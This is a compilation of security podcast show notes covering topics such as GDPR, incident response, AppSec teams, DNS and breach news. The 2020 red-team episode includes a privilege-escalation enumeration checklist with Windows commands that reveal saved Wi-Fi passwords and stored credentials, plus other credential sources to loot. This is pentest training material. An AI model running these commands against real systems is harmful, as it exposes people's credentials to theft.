https://gizmodo.com/cia-nsa-spies-tracked-anomaly-6-product-demo-1848830150
https://www.infosecurity-magazine.com/news/hackers-gain-admin-rights-with/
https://scottbarrykaufman.com/podcast/
Discord invite (must read and heed the Code of Conduct before admittance to the Discord).
Twitch stream: https://twitch.tv/brakesec
14 Jul 2022 | PyPI enables 2FA, some devs have a problem with this | 00:56:22
Full #twitch VOD here (prime sub or paid sub required): https://www.twitch.tv/videos/1528342722
https://thehackernews.com/2022/07/pypi-repository-makes-2af-security.html
Twitch streams (175+ hours of content!):
Twitter: @infosystir @boettcherpwned @brakesec @bryanbrake
07 Nov 2022 | JAMBOREE - an Android App testing platform from @operat0r -part2 | 01:04:15
Introducing @operat0r, who talked a bit about mobile device hacking and rooting/jailbreaking phones for testing. Grab the PowerShell script here: https://github.com/freeload101/Java-Android-Magisk-Burp-Objection-Root-Emulator-Easy
Check out the YouTube videos, including a demo! Part 2 is here: https://www.youtube.com/watch?v=RXgwUWpRuYA
22 Oct 2018 | 2018-037-iWatch saves man's life, Alexa detects your mood, and post-Derby discussion | 00:44:31
Health & Tech?
https://hackaday.io/project/151388-minder (774 results for “health” on hackaday)
(def don’t need to talk about, but still funny AF) https://hackaday.io/project/11407-myflow
https://9to5mac.com/2017/12/15/apple-watch-saves-life-managing-heart-attack/
Privacy implications?
Microsoft healthcare initiative - https://enterprise.microsoft.com/en-us/industries/health/
Apple Health - https://www.apple.com/ios/health/ - https://www.apple.com/researchkit/
https://www.papercall.io/dachfest18
Make plans for next year! Follow @derbycon on Twitter!
29 Sep 2021 | 2021-035-GRC selection discussion, TechSecChix, and the 'job description problem' | 01:06:57
GRC tools (Governance Risk and Compliance)
@ki_twyce_
@TechSecChix
Infosec Unplugged
Security Happy Hour
Eric’s cyberpoppa show
Cyber Insight show - cohost
Blumira is hiring https://www.blumira.com/careers/
https://www.cio.com/article/3206607/what-is-grc-and-why-do-you-need-it.html
https://www.oxial.com/all/how-to-go-about-choosing-your-grc-solution/
Why do we need a GRC tool? https://resilience.acoss.org.au/the-six-steps/managing-your-risks/risk-register
What are our business goals? (to make money... :D ) Are we mature enough to be measuring ourselves? How can we use this to be more efficient?
https://www.standardfusion.com/blog/the-future-of-grc-7-things-to-look-out-for/
GRC tool use in other areas
IT - makes more informed budget decisions, determines directions in business goals, asset mgmt
Finance - make better financial decisions, profitability
Infosec - vuln mgmt, compliance
HR - determine hiring requirements
Legal - ensures ethical management of the organization, reduces breach
How do you implement GRC? https://www.crowe.com/insights/6-steps-for-a-successful-grc-implementation
16 Jun 2022 | jon-dimaggio-part2-threat intel-hacking back-analyzing malware | 00:37:07
Author of the #noStarch book "The Art of Cyberwarfare" (https://nostarch.com/art-cyberwarfare)
www.infoseccampout.com for more information about our 2022 conference in Seattle, WA on 26-28 August 2022!
Our full 90 minute stream with Jon, including 30 minutes of audio you won't get on the audio podcast, is available at the $5 USD Patreon level, or via our VOD at our Twitch broadcast site (https://twitch.tv/brakesec)
Thank you to our Patreon and Twitch supporters for their generous donations and subs and bits!
17 Dec 2015 | 2015-052: Wim Remes-ISC2 board member | 00:46:52
I got hold of Mr. Wim Remes, because he was elected to the ISC2 board in November 2015. Recent changes to the CISSP included changing the long-standing 10 domains down to 8 domains, plus a major revamp to all of them. I wanted to know what Mr. Remes' plans were for the coming term, how the board works, and how organizations like ISC2 drive change in the industry. I also asked Wim how he is trying to ensure that CISSP and the other certs are going to remain current and competitive. This is a great interview if you're looking to get your #CISSP or any other ISC2 cert, or you currently have an #ISC2 #certification and want to learn about the workings of ISC2 and the board.
Mr. #Remes' Twitter: @wimremes ISC2 official site: http://www.isc2.org
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2015-052-wim_remes-isc2.mp3 iTunes: https://itunes.apple.com/us/podcast/2015-052-wim-remes-isc2-board/id799131292?i=359103338&mt=2 TuneIn Radio App: http://tunein.com/radio/Brakeing-Down-Security-Podcast-p801582/ BrakeSec Podcast Twitter: http://www.twitter.com/brakesec Join our Patreon!: https://www.patreon.com/bds_podcast Comments, Questions, Feedback: bds.podcast@gmail.com
28 Mar 2015 | 2015-014-SANS Top 20 Controls - #12 and #13 | 00:57:33
We continue our trek down the list of SANS Top 20 Critical Security Controls this week with #12 and #13 - Boundary Defense, and Controlled Use of Administrative Privileges. Learn what you can do to shore up your network defenses, and how to handle admin privileges: when to give that kind of access, and how to make privileged access as secure as possible while still allowing administrators to do their work.
https://www.sans.org/media/critical-security-controls/CSC-5.pdf
http://www.openspf.org/
https://4sysops.com/
21 Jul 2023 | meeting new people, walking on your keyboard causes issues, even google gets phone numbers wrong. | 01:20:11
Check out our sponsor (BLUMIRA) at https://blumira.com/brake
YouTube channel link: https://youtube.com/c/BDSPodcast
Full video on our YouTube channel! https://www.youtube.com/watch?v=BkBeLuM_urk
https://www.rapid7.com/blog/post/2023/07/11/cve-2023-29298-adobe-coldfusion-access-control-bypass/
https://therecord.media/cisa-warnings-adobe-microsoft-citrix-vulnerabilities
https://therecord.media/airline-customer-support-phone-number-fraud-google
https://twitter.com/Shmuli/status/1680669938468499458
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36884
https://www.jdsupra.com/legalnews/tabletop-exercises-as-risk-mitigation-5278057/
https://bevyengine.org/ - Rust game engine
https://flappybird.io/ - which I suck at, BTW
Intro/outro music:
22 Jul 2017 | 2017-025-How will GDPR affect your Biz with Wendyck, and DerbyCon CTF info | 01:10:49
Direct Link:http://traffic.libsyn.com/brakeingsecurity/2017-025-How-GDPR-affects-US-Biz-with-Wendyck-Derbycon2017-CTF-info.mp3
GDPR (General Data Protection Regulation) is weighing on the minds and pocketbooks of a lot of European companies, but is the US as worried? If you read many of the news articles out there, it ranges from 'meh' to 'OMG, the sky, it is falling'. GDPR will cause a lot of new issues in the way business is being done, not just in the realm of security, but in the way data is managed, maintained, catalogued, and shared. This week we invited Ms. Wendy Everette Knox (@wendyck) to come in and discuss some of the issues that might hit companies. We also discuss how GDPR and the exit (or not) of the UK from the #European #Union will affect data holders and citizens of the UK. If your company is preparing for the #GDPR mandate, check out the show notes for a lot of good info. ALSO, if you are looking for a ticket to #derbycon 2017, you need to listen to this show, because it has all the info you need to get started. The info is also in the show notes, including the form you need to post your flag information.
---Show Notes:----
The General Data Protection Regulation (GDPR) (Regulation (EU) 2016/679) is a regulation by which the European Parliament, the Council of the European Union and the European Commission intend to strengthen and unify data protection for all individuals within the European Union (EU). It also addresses the export of personal data outside the EU. The primary objectives of the GDPR are to give control back to citizens and residents over their personal data and to simplify the regulatory environment for international business by unifying the regulation within the EU.[1]
Would it be better if companies stored less data, or de-anon it to the point where a breach
Massive fines for breaches. Usually some percentage of profits…
(up to 4% of annual global turnover or €20 Million (whichever is greater))
“Under the GDPR, the Data Controller will be under a legal obligation to notify the Supervisory Authority without undue delay. The reporting of a data breach is not subject to any de minimis standard and must be reported to the Supervisory Authority within 72 hours of the data breach (Article 33).”
Is 72 hours for notification realistic? For massive breaches, 72 hours is just enough time to contain
Right to be forgotten (not realistic): “A right to be forgotten was replaced by a more limited right to erasure in the version of the GDPR adopted by the European Parliament in March 2014.[19][20] Article 17 provides that the data subject has the right to request erasure of personal data related to them on any one of a number of grounds including non-compliance with article 6.1 (lawfulness) that includes a case (f) where the legitimate interests of the controller is overridden by the interests or fundamental rights and freedoms of the data subject which require protection of personal data “
GDPR full text: http://ec.europa.eu/newsroom/document.cfm?doc_id=45631
Good intro:
Controversial topics: http://www.eugdpr.org/controversial-topics.html
Key Changes: http://www.eugdpr.org/key-changes.html
Difficulty of doing GDPR in the cloud https://hackernoon.com/why-gdpr-compliance-is-difficult-in-the-cloud-9755867a3662 US businesses largely ignoring GDPR http://www.informationsecuritybuzz.com/expert-comments/us-businesses-ignoring-gdpr/#infosec
Fears of breach cover-up (due to massive fines ‘up to 4% of profits’) http://tech.newstatesman.com/news/gdpr-cover-ups-security
From the UK ICO, 12 steps to take now to prepare for GDPR https://ico.org.uk/media/for-organisations/documents/1624219/preparing-for-the-gdpr-12-steps.pdf (has a nice infographic on p. 2)
CTF for Derby ticket. Level 1 - The internet is a big place :) I’ve hidden 3 flags out on it and it’s your job to see how many you can find. I’ll give you a few hints to start.
30 Sep 2015 | Derbycon - A podcast with Podcasters! *explicit* |
Mr. Boettcher and I attended Derbycon, and while he was out attending talks, I got invited to do a podcast with some of the other podcasters who were there. Special thanks to Edgar Rojas, Amanda Berlin, Jerry Bell, Andrew Kalat, Paul Coggin, Tim DeBlock, and everyone else at our recording. We have a bit more audio that we will post this month, including a discussion of a tool Mr. Boettcher and Michael Gough collaborated on to make Windows malware analysis easier to do.
28 Jul 2021 | 2021-026-Triaging threat research, Jira vulns, Serious Sam vuln, Systemd vulns, and HiveNightmare | 00:56:38
https://www.mindtools.com/pages/article/newHTE_95.htm https://www.infoq.com/news/2021/07/microsoft-linux-builder-mariner/ https://www.productplan.com/glossary/action-priority-matrix/
More PrintNightmare issues: “After installing updates released July 13, 2021 on domain controllers (DCs) in your environment, printers, scanners, and multifunction devices that are not compliant with section 3.2.1 of RFC 4556 spec might fail to print when using smart card (PIV) authentication,” Microsoft explained.
https://www.crowdstrike.com/blog/shlayer-malvertising-campaigns-still-using-flash-update-disguise/ “Shlayer, discovered in 2018, is constantly maintained and also evolving. The graph below is representative of Shlayer continually being a go-to piece of malware that attackers use to compromise the victim’s machine. We observed an uptick in Shlayer detections occurring before the release of CVE-2021-30657 (the Gatekeeper bypass) that was being exploited by Shlayer. This vulnerability was subsequently patched on April 26, 2021.”
https://www.zdnet.com/article/nasty-linux-systemd-security-bug-revealed/
https://access.redhat.com/security/cve/cve-2021-33910
“It works by enabling attackers to misuse the alloca() function in a way that would result in memory corruption. This, in turn, allows a hacker to crash systemd and hence the entire operating system. Practically speaking, this can be done by a local attacker mounting a filesystem on a very long path. This causes too much memory space to be used in the systemd stack, which results in a system crash.”
https://redmondmag.com/articles/2021/07/21/serioussam-windows-flaw.aspx
https://securityaffairs.co/wordpress/120576/security/apple-cve-2021-30807-zero-day.html
https://github.com/GossiTheDog/HiveNightmare
Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email bds.podcast@gmail.com #AmazonMusic: https://brakesec.com/amazonmusic #Spotify: https://brakesec.com/spotifyBDS #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: bds.podcast@gmail.com Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec
14 Jul 2019 | 2019-027-GDPR fines for British Airways, FTC fines Facebook, Zooma-palooza | 00:43:23
MITRE Pre-Attack techniques: https://attack.mitre.org/techniques/pre/
https://www.bbc.com/news/business-48905907
Zoom - https://www.wired.com/story/zoom-flaw-web-server-fix/
17 Dec 2020 | 2020-046-solarwinds-fireeye-breaches-GE-medical-device-issues-and-2021_predictions | 00:52:02
End of year podcast
Blumeria sponsorship
NEWS:
IT company SolarWinds says it may have been hit in 'highly sophisticated' hack | Reuters
FireEye hacked: US cybersecurity firm FireEye hit by 'state-sponsored' attack - BBC News
https://krypt3ia.wordpress.com/ - 16 december 2020
Microsoft flexing muscle to shutdown c2: Microsoft unleashes ‘Death Star’ on SolarWinds hackers in extraordinary response to breach - GeekWire
Little-known SolarWinds gets scrutiny over hack, stock sales (apnews.com)
FireEye, GoDaddy, and Microsoft create kill switch for SolarWinds backdoor - Security Affairs
US Gov has been hacked: US government agencies hacked; Russia a possible culprit (apnews.com)
Not mentioned during the podcast: Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor | FireEye Inc
Not trying to spread FUD, but would infiltration by using FOSS tools be easier than Solarwinds?
Time to remove Nano Adblocker and Defender from your browsers (except Firefox) - gHacks Tech News
System oriented programming - Cloud-Sliver (cloud-sliver.com)
G’bye Flash… Adobe releases final Flash Player update, warns of 2021 kill switch (bleepingcomputer.com)
IT workers worried about AI making them obsolete… IT Workers Fear Becoming Obsolete in Cyber Roles - Infosecurity Magazine (infosecurity-magazine.com)
Qbot malware switched to stealthy new Windows autostart method (bleepingcomputer.com)
https://www.atlasobscura.com/places/encryption-lava-lamps - “The randomness of this wall of lava lamps helps encrypt up to 10 percent of the internet.”
It’s been the year of the business continuity program this year… and how agile yours is. --thoughts?
Future? Bryan: Companies that are ‘all in’ on remote work will back track. Amanda: I think we’ll see way more keep the wfh now that they realize it saves $$
02 Feb 2024 | AccidentalCISO on BrakeSecEd, talking Leadership, SaaS development, and Appsec | 00:29:35
Disclaimer: The views, information, or opinions expressed on this program are solely the views of the individuals involved and by no means represent absolute facts. Opinions expressed by the host and guests can change at any time based on new information, and do not represent views of past, present, or future employers.
Recorded: 28 Jan 2024
Youtube VOD: https://youtube.com/live/uX7odQTBkyQ
Questions and topics:
Additional information / pertinent Links (Would you like to know more?):
Show points of Contact: Amanda Berlin: @infosystir @hackershealth Brian Boettcher: @boettcherpwned Bryan Brake: https://linkedin.com/in/brakeb Brakesec Website: https://www.brakeingsecurity.com Youtube channel: https://youtube.com/@brakeseced Twitch Channel: https://twitch.tv/brakesec
19 Sep 2022 | Uber Breach, MFA fatigue, who can help communicate biz risk? | 01:09:10
https://www.theverge.com/2022/9/16/23356213/uber-hack-teen-slack-google-cloud-credentials-powershell
https://www.zdnet.com/article/uber-security-breach-looks-bad-potentially-compromising-all-systems/
https://twitter.com/RachelTobac/status/1571542949606957057
Twitter: @infosystir @brakeSec @bryanbrake Twitch: https://twitch.tv/brakesec
19 Nov 2018 | 2018-040- Jarrod Frates discusses pentest processes | 01:21:18
Jarrod Frates, Inguardians (@jarrodfrates) - “Skittering Through Networks”
Ms. Berlin in Germany - How’d it go?
TinkerSec’s story: https://threadreaderapp.com/thread/1063423110513418240.html
Takeaways
Blue Team:
- Least Privilege Model
- Least Access Model: “limited remote access to only a small number of IT personnel”; “This user didn't need Citrix, so her Citrix linked to NOTHING”; “They limited access EVEN TO LOCAL ADMINS!”
- Multi-Factor Authentication
- Simple Anomaly Rule Fires: “Finance doesn’t use Powershell”
- Defense in Depth: “moving from passwords to pass phrases…”; “Improper disposal of information assets”
Red Team:
- Keep Trying
- Never Assume
- Bring In Help
- Luck Favors the Prepared
- Adapt and Overcome
Before the Test
During the Test
After the Test
Ms. Berlin’s Legit business - Mental Health Hackers
CFP for Bsides Seattle (Deadline: 26 November 2018) http://www.securitybsides.com/w/page/129078930/BsidesSeattle2019
CFP for BsidesNash https://twitter.com/bsidesnash/status/1063084215749787649 Closes Dec 31
Teaching a class in Seattle for SANS (SEC504) - need some students! Reach out to me for more information. Looking to do this at the end of February through March
15 Nov 2017 | 2017-038- Michael De Libero discusses building out your AppSec Team | 00:56:10
Direct Link: https://brakesec.com/2017-038
Michael De Libero spends his work hours running an application security team at a gaming development company. I (Bryan) was really impressed at the last NCC Group Quarterly meetup when he gave a talk (not recorded) about how to properly build out your Application Security Team. So I asked him on, and we went over the highlights of his talk. Some of the topics included:
- Discussing with management your manpower issues
- Who to include in your team
- Communication between teams
----SHOW NOTES:
Amanda’s appearance on PSW
Building an AppSec Team - Michael de Libero (@noskillz)
https://techbeacon.com/owasp-top-ten-update-what-your-security-team-needs-know
https://www.owasp.org/index.php/OWASP_AppSec_Pipeline
Need link to Michael’s slides -- https://docs.google.com/presentation/d/1Bvl2rybuWMdOu3cs03U85zwAvrM1RNxv99Dt-YiGiys/edit?usp=sharing
Random Notes from Mike:
How do you sell a company on having an appsec team if they don’t have one?
If you have an existing ‘security team’, how easy is it to augment that into an appsec team? Can you do job rotation with some devs? Do devs care enough to want to do code audits? “That’s not in my job description”
Skills needed in an appsec team: does it depend on the tech used, or the tech you might use?
Internal security vs. consultants
Intro to RE course with Tyler Hudak
Bsides Wellington speaker Amanda Berlin
12 Sep 2017 | 2017-032-incident response tabletops, equifax breach | 00:47:38
Everyone should be doing incident response tabletops, even if it's not a dedicated task in your organization. It allows you to find out what you might be lacking in terms of processes, manpower, requirements, etc. This week, we discuss what you need to do to get ready for one, and how those should go in terms of helping your organization understand how to handle the aftermath. And in case you've been under a rock, #equifax was breached. 143 million credit records are in the ether. We discuss the facts as of 9 September 2017, and what this means to the average user.
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2017-032-incident_response-equifax-done2.mp3
---SHOW NOTES---
Incident response
Must go beyond ‘threats’. What is in your environment?
- Struts aren’t a threat, or are they? Equifax didn’t think so at the time…
- Insider threat
- External entities
- Libraries, plugins/themes used (Wordpress)
Risk analysis:
- Qualitative
- Quantitative
What makes a good incident response exercise?
Once security controls have been created and implemented around your use cases, tabletop exercises and drills can serve as a proof-of-concept test of those controls. A tabletop exercise is a meeting of key stakeholders and staff who walk step by step through the mitigation of some type of disaster, malfunction, attack, or other emergency in a low-stress situation. A drill is when staff carry out as many of the processes, procedures, and mitigations that would be performed during one of those emergencies as possible.
Derbycon channel on Slack
Intro to RE class
https://blogs.apache.org/foundation/entry/apache-struts-statement-on-equifax
07 Sep 2019 | the last Derbycon Brakesec podcast | 00:50:43
This evening, we all came together to spend a bit of time talking about the final Derbycon. We talk to Mic Douglas about his 9 Derbycon appearances, and Gary Rimar (piano player Extraordinaire) talks about @litmoose's talk on how to tell C-Levels that their applications aren't good.
We also got asked about how the show came about, and how we found each other.
**Apologies for the echo in some parts... I did what I could to clean it up, but we were too close and the mics got a bit overzealous...**
27 Jul 2018 | 2018-026-insurers gathering data, netflix released a new DFIR tool, and google no longer gets phished? | 00:43:52
Stories and topics we covered: https://krebsonsecurity.com/2018/07/google-security-keys-neutralized-employee-phishing/
05 Nov 2018 | 2018-038-InfosecSherpa, security culture | 00:59:12
@InfoSecSherpa
I have two talks coming up:
*Shameless Plug* My Nuzzel newsletters: https://nuzzel.com/InfoSecSherpa/cybersecurity-africa
News stories -
Biglaw Firm Hit With Cybersecurity Incident Earlier This Month (Published: 29 October 2018 | Source: Above the Law)
Porn-Watching Employee Infected Government Networks With Russian Malware, IG Says (Published: 25 October 2018 | Source: Next Gov)
25 Oct 2021 | 2021-038-Liz Saling, 5 pillars of building a good team | 01:07:18
Blog post that inspired this episode: https://lizsaling.com/SWE-team-five-pillars/
Liz Saling (@lizsaling)
https://www.mindtools.com/pages/article/newLDR_86.htm
http://www.mspguide.org/tool/tuckman-forming-norming-storming-performing
https://michaelhyatt.com/3-roadblocks-to-avoid-for-optimal-team-performance
Erin Meyer is the one who did the Netflix study! https://bigthink.com/the-present/high-performing-teams/
https://alicedartnell.com/blog/why-smart-goals-are-stupid/
NEWS:
Unlocking ‘god’ mode on Windows 11: https://www.bleepingcomputer.com/news/microsoft/how-to-unlock-windows-11s-god-mode-to-access-advanced-settings/
https://www.reddit.com/r/netsec/comments/q9f63y/creating_a_basic_python_reverse_shell_listener/
NFT malware (NFTs that empty wallets): https://www.theregister.com/2021/10/17/in_brief_security/
15 Aug 2021 | 2021-029- incident response, PICERL cycle, showing value in IR, aligning with business goals -p1 | 00:40:08
https://blog.teamascend.com/6-phases-of-incident-response
https://www.securitymetrics.com/blog/6-phases-incident-response-plan
Recent vulnerabilities got Bryan thinking about incident response. Are organizations speedy enough to keep up? If the spate of vulns continues, what can we do to ensure we are dealing with the most important issues? How do we communicate those issues to management? How should we handle the workload?
Testing of your IR costs money; do you have budget for that? (Verodin, red team)
Restoring backups; extra VPC or Azure environment
Incidents occur. You have to minimize issues, right? But is there a good way of doing that? Simplify your environment? Spend time working on the CIS 20? You gotta plan for that and show value vs effort.
Incident response is an ever changing landscape.
What is the goal of IR?
- Minimize damage
- Identify affected systems
- Recover gracefully and quickly? Does your environment allow for quick recovery? What does ‘return to normal’ look like?
The goal of business: make money. Incidents should just be considered part of doing business (risks). The more popular, the more likely the attack.
Incident timeframe = criteria for getting back to normal.
PICERL is a cycle, and one of continual improvement. Incident response is not ‘one and done’.
27 Mar 2018 | 2018-010 - The ransoming of Atlanta, Facebook slurping PII, Dridex variants | 00:37:46
Matt Miller’s #Assembly and #Reverse #Engineering class: $150 USD for each class, $250 USD for both classes
Syllabus: https://docs.google.com/document/d/1alsTUhGwAAnR6BA27gGo3OdjEHFnq2wtQsynPfeWzd0/edit?usp=sharing
Please state which class you'd like to take when ordering in the "Notes" field in Paypal: https://paypal.me/BDSPodcast/150usd
To sign up for both classes: https://paypal.me/BDSPodcast/250usd
Stories:
https://threatpost.com/orbitz-warns-880000-payment-cards-suspected-stolen/130601/
TLS 1.3 - https://www.theregister.co.uk/2018/03/27/with_tls_13_signed_off_its_implementation_time/
https://timtaubert.de/blog/2015/11/more-privacy-less-latency-improved-handshakes-in-tls-13
Sign up for Jay Beale's class at Black Hat 2018: https://www.blackhat.com/us-18/training/aikido-on-the-command-line-linux-lockdown-and-proactive-security.html
26 Jun 2018 | 2018-022-preventing_insider_threat | 00:47:32
After the recent Tesla insider threat event, BrakeSec decided to discuss some of the indicators of insider threat, what can be done to mitigate it, and why it happens.
News stories referenced: https://www.infosecurity-magazine.com/news/teslas-tough-lesson-on-malicious/
https://en.wikipedia.org/wiki/Insider_threat
https://en.wikipedia.org/wiki/Insider_threat_management
07 Mar 2016 | 2016-010-DNS_Reconnaissance | 00:49:54
DNS... we take it for granted... it's just there. And we only know it's broken when your boss can't get to Facebook. This week, we discuss the Domain Name System (DNS). We start with a bit of history, talking about the origins of DNS, some of the RFCs involved in its creation, how its hierarchical structure functions to allow resolution to occur, and even why your /etc/hosts is important. We discuss some of the necessary fields in your DNS records (MX, ALIAS, CNAME, SOA, TXT) and how DNS is used for non-repudiation in email. We also touch on how you can use DNS to enumerate an external network presence when you are the red team, and what you should know to make it harder for bad actors to use your external DNS in amplification attacks. Finally, you can't have a discussion about DNS without talking about how to secure your DNS implementation. So we supply you with a few tips and best practices. Plenty of informational links down below, including links to the actual RFCs (Request for Comment) which detail how DNS is supposed to function. Think of them as the owner's manual for your car.
Direct Download: http://traffic.libsyn.com/brakeingsecurity/2016-010-DNS_Reconnaissance.mp3
#iTunes: https://itunes.apple.com/us/podcast/2016-010-dns-reconnaissance/id799131292?i=364331694&mt=2
Podcast Links we used for information:
http://www.slideshare.net/BizuworkkJemaneh/dns-42357401
300+ million domains registered: https://www.verisign.com/en_US/internet-technology-news/verisign-press-releases/articles/index.xhtml?artLink=aHR0cDovL3ZlcmlzaWduLm13bmV3c3Jvb20uY29tL2FydGljbGUvcnNzP2lkPTIwMTIwNTI%3D
https://technet.microsoft.com/en-us/library/cc770432.aspx
http://security-musings.blogspot.com/2013/03/building-secure-dns-infrastructure.html
http://tldp.org/HOWTO/DNS-HOWTO-6.html
https://en.wikipedia.org/wiki/Domain_Name_System
https://en.wikipedia.org/wiki/DNS_spoofing
http://www.esecurityplanet.com/network-security/how-to-prevent-dns-attacks.html
http://www.thegeekstuff.com/2012/05/ettercap-tutorial/
https://support.google.com/a/answer/48090?hl=en
http://www.ecsl.cs.sunysb.edu/tr/TR187.pdf
https://tools.ietf.org/html/rfc882
https://tools.ietf.org/html/rfc883
https://tools.ietf.org/html/rfc1034
https://tools.ietf.org/html/rfc1035
01 Jun 2020 | 2020-021- Derek Rook, redteam tactics, blue/redteam comms, and detection of testing | 01:17:03
**If Derek told you about us at SANS, send a DM to @brakeSec or email bds.podcast@gmail.com for an invite to our slack** OSCP/HtB/VulnHub is a game... designed to have a tester find a specific nugget of information to pivot or gain access to greater power on the system. Far different in the 'real' world.
Privilege escalation in Windows: *as of June 2020, many of these items still work, may not work completely in the future* *even so, many of these may not work if other mitigating controls are in place*
PENTEST METHODOLOGY:
PTES - http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines
OSSTMM - https://www.isecom.org/OSSTMM.3.pdf
Redteam methodology: https://www.synopsys.com/glossary/what-is-red-teaming.html
https://www.fuzzysecurity.com/tutorials/16.html
https://medium.com/@Shorty420/enumerating-ad-98e0821c4c78
Enumerate the machine:
- Services
- Network connections
- Users
- Logins
- Domains
- Files
- Software installed (putty, git, MSO, etc) *older software may install with improper permissions*
- Service paths (along with the users services are run as)
- Windows Features (WSL, SSH, etc)
- Patch level (Build 1703, etc)
- Wifi networks and passwords (netsh wlan show profile <SSID> key=clear)
- Powershell history
- Bash History (if WSL is used)
- Incognito tokens
- Stored credentials (cmdkey /list)
- Powershell transcripts (search text files for "Windows PowerShell transcript start")
Context for the above: understand how the users make use of the system and how they connect to other systems, then follow those paths to find lateral movement, misconfigurations, etc. Each new system or user will provide further information to loot or avenues to explore.
Linux EoP:
https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Enumeration: mostly the same as above
- Bash history or profile files
- Writable scripts (tampering with paths or environment variables)
- Setuid/Setgid binaries
- Sticky bit directories
- Crontabs
- Email spools
- World writable/readable files
- .ssh config files (keys, active sessions)
- Tmux/screen sessions
- Application secrets (database files, web files with database connectivity, hard coded creds or keys, etc)
- VPN profiles
- GNOME keyrings - https://askubuntu.com/questions/96798/where-does-seahorse-gnome-keyring-store-its-keyrings
Ways to defend against those kinds of EoP.
Something cool: https://www.youtube.com/playlist?playnext=1&list=PLnxNbFdr_l6sO6vR6Vx8sAJZKpgKtWaGX&feature=gws_kp_artist -- high Rollers
Derek is speaking at SANS SUMMIT happening on 04-05 June (FREE!) - https://www.sans.org/event/hackfest-ranges-summit-2020
Ms. Berlin is speaking at EDUCAUSE - VIRTUAL (04 June) https://www.educause.edu/
10 Feb 2014 | Episode 5 - Interview with Frank Kim | 00:19:18
This week, we interviewed Frank Kim, an instructor from SANS, who talks about developer methods, the challenges of getting developers to code securely, and the efforts to create a culture of secure coding. Intro "Private Eye", transition "Mining by Moonlight", and Outro "Honeybee" created by Kevin MacLeod (incompetech.com)
15 Dec 2016 | 2016-049-Amanda Berlin, the art of the sale, and Decision making trees | 00:56:47
"Always Be Closing" is the mantra that Alec Baldwin's character "Blake" intones in the movie "#GlenGarry #Glen #Ross". Ironically, the film about 4 men selling was a failure in the theaters. A lot of times as #blue #teamers, we find ourselves in the sights of a #sales person, or often enough, we are inviting them into our conference rooms to find out how their widget will help save the day. There's an art to the concept of selling, honed over the past 500,000 years, since Ugg tried to convince Oog that his wheel would revolutionize work... We asked Ms. Amanda Berlin (@infosystir) to join us this week, for her expertise working at a security company, as well as being someone who sells products, to discuss how and why sales and sales engineers do what they do. I posit that there must be a 'decision tree' or script that most follow in an effort to make a sale, and we discuss how to confront the pushy sales pitch head on, or in Amanda's way, to avoid it altogether. We discuss Amanda's book, which she co-wrote with Lee Brotherston, whom we've had on our show before. Their #O'Reilly #book is on pre-sale right now, so you can order "The #Defensive #Security #Handbook" here: http://shop.oreilly.com/product/0636920051671.do
Direct Link: http://traffic.libsyn.com/brakeingsecurity/2016-049-amanda_berlin_the_art_of_the_sale_decision_making_trees.mp3
iTunes: https://itunes.apple.com/us/podcast/2016-049-amanda-berlin-art/id799131292?i=1000378988303&mt=2
Youtube: https://www.youtube.com/watch?v=v0llOSXfzBg
Special deal for our #BrakeSec Listeners:
18 Dec 2023 | Brakesec Call to Action 2023 | 00:02:51
Youtube Video: https://youtu.be/IUDPlQaQg8M https://forms.gle/rf145MoN7cskwMjf8 Thank all of you for listening and for your input. RSS feed for the audio podcast is at https://www.brakeingsecurity.com/rss
20 May 2020 | 2020-019-Masha Sedova, customized training, phishing, ransomware, and privacy implications | 00:39:22
Masha Sedova - Founder, Elevate Security
Topic ideas from the PR company:
The secret is, security teams have installed tons of security tooling that can give insights into how our employees are behaving. But we just leave this data on the cutting room floor. Masha Sedova can talk about where to find this goldmine of data and what security teams can do to leverage this new found knowledge.
Technology like vuln scanners or something more?
Motivation Theory (Deming): https://en.wikipedia.org/wiki/W._Edwards_Deming#Key_principles
X&Y https://en.wikipedia.org/wiki/Theory_X_and_Theory_Y
Ouchi Z theory https://en.wikipedia.org/wiki/Theory_Z_of_Ouchi
Masha’s suggested topics:
Why do security teams have difficulty in understanding their human risk today? What are the blockers?
What should security teams be measuring to get a holistic view of human risk?
What's the difference between security culture, security behavior change, and security awareness?
Is security culture a core capability in security defense? Why or why not?
Quantifying risk…
Is investing in human training a waste of time?
Phishing - mock phish or real phishing; pull data to see who is clicking on links; send an ‘intervention’
Gotta move away from training The ‘security team’ will save them…
https://www.ncsc.gov.uk/guidance/phishing
Books:
https://www.amazon.com/Nudge-Improving-Decisions-Health-Happiness/dp/014311526X
Reality broken: https://www.amazon.com/Reality-Broken-Games-Better-Change/dp/0143120611
People centric security: https://www.amazon.com/People-Centric-Security-Transforming-Enterprise-Culture/dp/0071846778/ref=sr_1_1?dchild=1&keywords=people+centric+security&qid=1588733580&s=books&sr=1-1
Deep Thought: a cybersecurity novella: https://www.ideas42.org/blog/project/human-behavior-cybersecurity/deep-thought-a-cybersecurity-story/
